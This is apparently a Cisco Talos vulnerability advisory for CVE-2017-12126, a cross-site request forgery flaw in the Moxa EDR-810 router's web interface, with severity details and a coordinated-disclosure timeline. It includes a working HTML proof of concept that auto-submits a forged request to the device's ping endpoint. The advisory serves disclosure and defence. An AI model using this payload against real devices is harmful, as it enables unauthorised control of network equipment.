Headline
CVE-2017-12126: TALOS-2017-0478 || Cisco Talos Intelligence Group
An exploitable cross-site request forgery vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP packet can cause cross-site request forgery. An attacker can create malicious HTML to trigger this vulnerability.
Summary
An exploitable cross-site request forgery vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP packet can cause cross-site request forgery. An attacker can create malicious HTML to trigger this vulnerability.
Tested Versions
Moxa EDR-810 V4.1 build 17030317
Product URLs
https://www.moxa.com/product/EDR-810.htm
CVSSv3 Score
8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE
CWE-352 - Cross-Site Request Forgery (CSRF)
Details
In order to trigger the CSRF a logged in user needs to visit a page with malicious code on it. The malicious code will be able to do anything the logged in user can do. For example the malicious code could add a user, modify firewall rules, etc. This could also be chained with a command injection to get a root shell on the device. This problem is compounded by the fact that users cannot log out of the device, meaning that a user’s session will remain valid long after they’ve stopped interacting with the device.
Exploit Proof-of-Concept
<html>
<body>
<form action="http://192.168.127.254/goform/net_WebPingGetValue" method="POST">
<input type="hidden" name="pingTmp" value="192.168.127.22" />
<input type="hidden" name="ifs" value="1" />
<input type="hidden" name="ip" value="192.168.127.22" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Timeline
2017-11-15 - Vendor Disclosure
2017-11-19 - Vendor Acknowledged
2017-12-25 - Vendor provided timeline for fix (Feb 2018)
2018-01-04 - Timeline pushed to mid-March per vendor
2018-03-24 - Talos follow up with vendor for release timeline
2018-03-26 - Timeline pushed to 4/13/18 per vendor
2018-04-12 - Vendor patched & published new firmware on website
2018-04-13 - Public Release
Discovered by Carlos Pacho of Cisco Talos.